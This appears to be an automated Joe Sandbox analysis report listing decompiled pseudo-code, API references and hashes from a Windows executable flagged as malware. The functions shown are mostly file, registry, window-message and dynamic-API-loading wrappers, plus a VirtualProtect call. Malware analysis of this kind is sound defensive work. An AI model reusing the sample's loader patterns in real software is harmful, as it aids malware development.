                                                                            • Opcode Fuzzy Hash: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                                                            • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040690A(signed int _a4) {
                                                                            				struct HINSTANCE__* _t5;
                                                                            				signed int _t10;
                                                                            
                                                                            				_t10 = _a4 << 3;
                                                                            				_t8 =  *(_t10 + 0x40a3e0);
                                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                            				if(_t5 != 0) {
                                                                            					L2:
                                                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                            				}
                                                                            				_t5 = E0040689A(_t8); // executed
                                                                            				if(_t5 == 0) {
                                                                            					return 0;
                                                                            				}
                                                                            				goto L2;
                                                                            			}






                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                              • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                              • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                              • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

                                                                            C-Code - Quality: 100%
                                                                            			E00402C05(signed int __eax) {
                                                                            				RECT* _t10;
                                                                            				void* _t16;
                                                                            
                                                                            				SendMessageW( *(_t16 - 8), 0xb,  *0x42f268 & __eax, _t10); // executed
                                                                            				if( *((intOrPtr*)(_t16 - 0x30)) != _t10) {
                                                                            					InvalidateRect( *(_t16 - 8), _t10, _t10);
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t16 - 4));
                                                                            				return 0;
                                                                            			}






                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000000B,?), ref: 00402C14
                                                                            • InvalidateRect.USER32(?), ref: 00402C24

                                                                            C-Code - Quality: 68%
                                                                            			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                                            				signed int _t5;
                                                                            				void* _t6;
                                                                            
                                                                            				_t5 = GetFileAttributesW(_a4); // executed
                                                                            				asm("sbb ecx, ecx");
                                                                            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                            				return _t6;
                                                                            			}






                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

                                                                            C-Code - Quality: 100%
                                                                            			E00406008(WCHAR* _a4) {
                                                                            				signed char _t3;
                                                                            				signed char _t7;
                                                                            
                                                                            				_t3 = GetFileAttributesW(_a4); // executed
                                                                            				_t7 = _t3;
                                                                            				if(_t7 != 0xffffffff) {
                                                                            					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                            				}
                                                                            				return _t7;
                                                                            			}






                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021

                                                                            C-Code - Quality: 100%
                                                                            			E00405AEB(WCHAR* _a4) {
                                                                            				int _t2;
                                                                            
                                                                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                            				if(_t2 == 0) {
                                                                            					return GetLastError();
                                                                            				}
                                                                            				return 0;
                                                                            			}





                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                            • GetLastError.KERNEL32 ref: 00405AFF

                                                                            C-Code - Quality: 38%
                                                                            			E713C2B98(void* __ecx, intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				void* _t28;
                                                                            				void* _t29;
                                                                            				void* _t33;
                                                                            				void* _t37;
                                                                            				void* _t40;
                                                                            				void* _t45;
                                                                            				void* _t49;
                                                                            				signed int _t56;
                                                                            				void* _t61;
                                                                            				void* _t70;
                                                                            				intOrPtr _t72;
                                                                            				signed int _t77;
                                                                            				intOrPtr _t79;
                                                                            				intOrPtr _t80;
                                                                            				void* _t81;
                                                                            				void* _t87;
                                                                            				void* _t88;
                                                                            				void* _t89;
                                                                            				void* _t90;
                                                                            				intOrPtr _t93;
                                                                            				intOrPtr _t94;
                                                                            
                                                                            				if( *0x713c5050 != 0 && E713C2ADB(_a4) == 0) {
                                                                            					 *0x713c5054 = _t93;
                                                                            					if( *0x713c504c != 0) {
                                                                            						_t93 =  *0x713c504c;
                                                                            					} else {
                                                                            						E713C30C0(E713C2AD5(), __ecx);
                                                                            						 *0x713c504c = _t93;
                                                                            					}
                                                                            				}
                                                                            				_t28 = E713C2B09(_a4);
                                                                            				_t94 = _t93 + 4;
                                                                            				if(_t28 <= 0) {
                                                                            					L9:
                                                                            					_t29 = E713C2AFD();
                                                                            					_t72 = _a4;
                                                                            					_t79 =  *0x713c5058;
                                                                            					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                            					 *0x713c5058 = _t72;
                                                                            					E713C2AF7();
                                                                            					_t33 = HeapCreate(??, ??, ??); // executed
                                                                            					 *0x713c5034 = _t33;
                                                                            					 *0x713c5038 = _t79;
                                                                            					if( *0x713c5050 != 0 && E713C2ADB( *0x713c5058) == 0) {
                                                                            						 *0x713c504c = _t94;
                                                                            						_t94 =  *0x713c5054;
                                                                            					}
                                                                            					_t80 =  *0x713c5058;
                                                                            					_a4 = _t80;
                                                                            					 *0x713c5058 =  *((intOrPtr*)(E713C2AFD() + _t80));
                                                                            					_t37 = E713C2AE9(_t80);
                                                                            					_pop(_t81);
                                                                            					if(_t37 != 0) {
                                                                            						_t40 = E713C2B09(_t81);
                                                                            						if(_t40 > 0) {
                                                                            							_push(_t40);
                                                                            							_push(E713C2B14() + _a4 + _v8);
                                                                            							_push(E713C2B1E());
                                                                            							if( *0x713c5050 <= 0 || E713C2ADB(_a4) != 0) {
                                                                            								_pop(_t88);
                                                                            								_pop(_t45);
                                                                            								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                            								if(__eflags == 0) {
                                                                            								}
                                                                            								asm("loop 0xfffffff5");
                                                                            							} else {
                                                                            								_pop(_t89);
                                                                            								_pop(_t49);
                                                                            								 *0x713c504c =  *0x713c504c +  *(_t89 + _t49) * 4;
                                                                            								asm("loop 0xffffffeb");
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					_t107 =  *0x713c5058;
                                                                            					if( *0x713c5058 == 0) {
                                                                            						 *0x713c504c = 0;
                                                                            					}
                                                                            					E713C2B42(_t107, _a4,  *0x713c5034,  *0x713c5038);
                                                                            					return _a4;
                                                                            				}
                                                                            				_push(E713C2B14() + _a4);
                                                                            				_t56 = E713C2B1A();
                                                                            				_v8 = _t56;
                                                                            				_t77 = _t28;
                                                                            				_push(_t68 + _t56 * _t77);
                                                                            				_t70 = E713C2B26();
                                                                            				_t87 = E713C2B22();
                                                                            				_t90 = E713C2B1E();
                                                                            				_t61 = _t77;
                                                                            				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                            					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                            				asm("loop 0xfffffff1");
                                                                            				goto L9;
                                                                            			}


                                                                            APIs
                                                                            • HeapCreate.KERNELBASE(00000000), ref: 713C2C57
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHeap
                                                                            • String ID:
                                                                            • API String ID: 10892065-0
                                                                            • Opcode ID: d81ed9555591e6ed77917dfb864ce680b7bbd48f2f5b53c9f3656c17f597de13
                                                                            • Instruction ID: 33b8023e59796edb955993204b224d9a6c5a637496bf32c05f3e477323bed6a6
                                                                            • Opcode Fuzzy Hash: d81ed9555591e6ed77917dfb864ce680b7bbd48f2f5b53c9f3656c17f597de13
                                                                            • Instruction Fuzzy Hash: FF419EB36082159FDB129FA9D884F693778FB14B18F30842AE806C61D0DB39EC858B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(?,-2F33BA73), ref: 02AB87D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: e49b838e02fa4b4cbe95243c08d3eca617bd0371067ca87fdb07293936795045
                                                                            • Instruction ID: 29cba26b2051387fb31eceea78d160804c55fd06e25db7ec6271e5e33486361b
                                                                            • Opcode Fuzzy Hash: e49b838e02fa4b4cbe95243c08d3eca617bd0371067ca87fdb07293936795045
                                                                            • Instruction Fuzzy Hash: 4E214876944349CFCB248E788D987DA73B6BFA9240F46011D9C4D9B241D3344A45CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnumWindows
                                                                            • String ID:
                                                                            • API String ID: 1129996299-0
                                                                            • Opcode ID: 5140e1b5080d8ccb9bccb4062458a77d397766b35d853c1d675924b4664f0641
                                                                            • Instruction ID: fba02fedc66faa78ea821d3f88c6d09781324a92a17243d83d97a98ef6616018
                                                                            • Opcode Fuzzy Hash: 5140e1b5080d8ccb9bccb4062458a77d397766b35d853c1d675924b4664f0641
                                                                            • Instruction Fuzzy Hash: 26E026B09043386FC7299F30ACA08EE3E38EB81244B00152DE01D5B741C6325A01CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004023B2(int __eax, WCHAR* __ebx) {
                                                                            				WCHAR* _t11;
                                                                            				WCHAR* _t13;
                                                                            				void* _t17;
                                                                            				int _t21;
                                                                            
                                                                            				_t11 = __ebx;
                                                                            				_t5 = __eax;
                                                                            				_t13 = 0;
                                                                            				if(__eax != __ebx) {
                                                                            					__eax = E00402DA6(__ebx);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                            					_t13 = E00402DA6(0x11);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                            					_t11 = E00402DA6(0x22);
                                                                            				}
                                                                            				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                                            				_t21 = _t5;
                                                                            				if(_t21 == 0) {
                                                                            					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                                            				return 0;
                                                                            			}








                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                            • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                            • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                            • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                            				void* _t7;
                                                                            				long _t8;
                                                                            				void* _t9;
                                                                            
                                                                            				_t7 = E00406329(_a4,  &_a12);
                                                                            				if(_t7 != 0) {
                                                                            					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                            					return _t8;
                                                                            				}
                                                                            				_t9 = 6;
                                                                            				return _t9;
                                                                            			}







                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                            • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                            • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004060DF(void* _a4, void* _a8, long _a12) {
                                                                            				int _t7;
                                                                            				long _t11;
                                                                            
                                                                            				_t11 = _a12;
                                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                            					return 0;
                                                                            				} else {
                                                                            					return 1;
                                                                            				}
                                                                            			}






                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004060B0(void* _a4, void* _a8, long _a12) {
                                                                            				int _t7;
                                                                            				long _t11;
                                                                            
                                                                            				_t11 = _a12;
                                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                            					return 0;
                                                                            				} else {
                                                                            					return 1;
                                                                            				}
                                                                            			}






                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                            
                                                                            				 *0x713c5048 = _a4;
                                                                            				if(_a8 == 1) {
                                                                            					VirtualProtect(0x713c505c, 4, 0x40, 0x713c504c); // executed
                                                                            					 *0x713c505c = 0xc2;
                                                                            					 *0x713c504c = 0;
                                                                            					 *0x713c5054 = 0;
                                                                            					 *0x713c5068 = 0;
                                                                            					 *0x713c5058 = 0;
                                                                            					 *0x713c5050 = 0;
                                                                            					 *0x713c5060 = 0;
                                                                            					 *0x713c505e = 0;
                                                                            				}
                                                                            				return 1;
                                                                            			}




                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(713C505C,00000004,00000040,713C504C), ref: 713C2A9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004023F4(short __ebx) {
                                                                            				short _t7;
                                                                            				WCHAR* _t8;
                                                                            				WCHAR* _t17;
                                                                            				void* _t21;
                                                                            				void* _t24;
                                                                            
                                                                            				_t7 =  *0x40a010; // 0xa
                                                                            				 *(_t21 + 8) = _t7;
                                                                            				_t8 = E00402DA6(1);
                                                                            				 *(_t21 - 0x10) = E00402DA6(0x12);
                                                                            				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x3ff, E00402DA6(0xffffffdd)); // executed
                                                                            				_t24 =  *_t17 - 0xa;
                                                                            				if(_t24 == 0) {
                                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                            					 *_t17 = __ebx;
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                            				return 0;
                                                                            			}









                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID:
                                                                            • API String ID: 1096422788-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                            				void* _t7;
                                                                            				long _t8;
                                                                            				void* _t9;
                                                                            
                                                                            				_t7 = E00406329(_a4,  &_a12);
                                                                            				if(_t7 != 0) {
                                                                            					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                            					return _t8;
                                                                            				}
                                                                            				_t9 = 6;
                                                                            				return _t9;
                                                                            			}







                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004015A3() {
                                                                            				int _t5;
                                                                            				void* _t11;
                                                                            				int _t14;
                                                                            
                                                                            				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                            				_t14 = _t5;
                                                                            				if(_t14 == 0) {
                                                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                                                            				return 0;
                                                                            			}







                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004044E5(int _a4) {
                                                                            				struct HWND__* _t2;
                                                                            				long _t3;
                                                                            
                                                                            				_t2 =  *0x433ed8;
                                                                            				if(_t2 != 0) {
                                                                            					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                            					return _t3;
                                                                            				}
                                                                            				return _t2;
                                                                            			}






                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004044CE(int _a4) {
                                                                            				long _t2;
                                                                            
                                                                            				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                                            				return _t2;
                                                                            			}





                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004034E5(long _a4) {
                                                                            				long _t2;
                                                                            
                                                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                            				return _t2;
                                                                            			}





                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004044BB(int _a4) {
                                                                            				int _t2;
                                                                            
                                                                            				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                                            				return _t2;
                                                                            			}





                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004014D7(intOrPtr __edx) {
                                                                            				long _t3;
                                                                            				void* _t7;
                                                                            				intOrPtr _t10;
                                                                            				void* _t13;
                                                                            
                                                                            				_t10 = __edx;
                                                                            				_t3 = E00402D84(_t7);
                                                                            				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                                            				if(_t3 <= 1) {
                                                                            					_t3 = 1;
                                                                            				}
                                                                            				Sleep(_t3); // executed
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
                                                                            				return 0;
                                                                            			}








                                                                            APIs
                                                                            • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                            			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				long _v16;
                                                                            				long _v20;
                                                                            				long _v24;
                                                                            				char _v28;
                                                                            				intOrPtr _v32;
                                                                            				long _v36;
                                                                            				char _v40;
                                                                            				unsigned int _v44;
                                                                            				signed int _v48;
                                                                            				WCHAR* _v56;
                                                                            				intOrPtr _v60;
                                                                            				intOrPtr _v64;
                                                                            				intOrPtr _v68;
                                                                            				WCHAR* _v72;
